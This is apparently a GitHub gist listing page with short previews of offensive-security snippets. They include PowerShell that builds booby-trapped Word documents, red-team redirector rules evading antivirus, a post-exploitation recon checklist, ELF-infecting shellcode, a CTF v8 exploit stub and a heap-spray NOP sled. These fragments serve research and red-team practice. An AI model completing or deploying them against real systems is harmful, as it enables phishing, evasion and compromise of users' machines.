This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# target file path | |
$filename = [Environment]::GetFolderPath('Desktop') + '\WebBrowser.docx' | |
# path to open | |
#$path = 'c:\windows\system32\calc.exe' | |
$path = 'https://securify.nl/blog/SFY20180801/thisisfine.url' | |
# the temp file is used for creating the icon | |
$tmpfile = "$env:TEMP\Totally Safe.txt" |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# target file path | |
$filename = [Environment]::GetFolderPath('Desktop') + '\Forms.HTML.docx' | |
$progid = 'Forms.HTML:Image.1' | |
$clsid = '5512D112-5CC6-11CF-8D67-00AA00BDCE1D' | |
$html = '<x type="image" src="https://securify.nl/blog/SFY20180801/packager.emf" action="file:///c|/windows/system32/calc.exe">' | |
# load assemblies for changing the docx (zip) file | |
[void] [Reflection.Assembly]::LoadWithPartialName('System.IO.Compression.FileSystem') | |
[void] [Reflection.Assembly]::LoadWithPartialName('System.IO.Compression') |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# PowerView's last major overhaul is detailed here: http://www.harmj0y.net/blog/powershell/make-powerview-great-again/ | |
# tricks for the 'old' PowerView are at https://gist.github.com/HarmJ0y/3328d954607d71362e3c | |
# the most up-to-date version of PowerView will always be in the dev branch of PowerSploit: | |
# https://github.com/PowerShellMafia/PowerSploit/blob/dev/Recon/PowerView.ps1 | |
# New function naming schema: | |
# Verbs: | |
# Get : retrieve full raw data sets | |
# Find : ‘find’ specific data entries in a data set |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#include "stdafx.h" | |
int main() | |
{ | |
ICLRMetaHost *metaHost = NULL; | |
IEnumUnknown *runtime = NULL; | |
ICLRRuntimeInfo *runtimeInfo = NULL; | |
ICLRRuntimeHost *runtimeHost = NULL; | |
IUnknown *enumRuntime = NULL; | |
LPWSTR frameworkName = NULL; |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
RewriteEngine On | |
RewriteOptions Inherit | |
# Uncomment the below line for verbose logging, including seeing which rule matched. | |
#LogLevel alert rewrite:trace5 | |
# BURN AV BURN | |
# Class A Exclusions. Includes large ranges from Azure & AWS | |
# Cloudfronted requests by default will have a UA of "Amazon Cloudfront". More info here: https://docs.aws.amazon.com/AmazonCloudFront/latest/DeveloperGuide/header-caching.html#header-caching-web-device |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Windows version: | |
reg query x64 HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion | |
Users who have authed to the system: | |
ls C:\Users\ | |
System env variables: | |
reg query x64 HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\Environment | |
Saved outbound RDP connections: |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; | |
;;; | |
;;; Copyright (C), zznop, [email protected] | |
;;; | |
;;; This software may be modified and distributed under the terms | |
;;; of the MIT license. See the LICENSE file for details. | |
;;; | |
;;; DESCRIPTION | |
;;; | |
;;; This PoC shellcode is meant to be compiled as a blob and prepended to a ELF |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
/* Plaid CTF 2018 v8 Exploit. Exploit begins around line 240 */ | |
/* ### Utils, thanks saelo ### */ | |
// | |
// Tiny module that provides big (64bit) integers. | |
// | |
// Copyright (c) 2016 Samuel Groß | |
// |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
// Load Int library, thanks saelo! | |
load('util.js'); | |
load('int64.js'); | |
// Helpers to convert from float to in a few random places | |
var conva = new ArrayBuffer(8); | |
var convf = new Float64Array(conva); | |
var convi = new Uint32Array(conva); | |
var convi8 = new Uint8Array(conva); |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<script> | |
function gc() { for (let i = 0; i < 0x10; i++) { new ArrayBuffer(0x1000000); } } | |
var sc = []; | |
for (var i=0; i<0x480; i++) { | |
sc.push(0x90); | |
} | |
//sc.push(0xcc); | |
//sc.push(0xeb); | |
//sc.push(0xfe); |
OlderNewer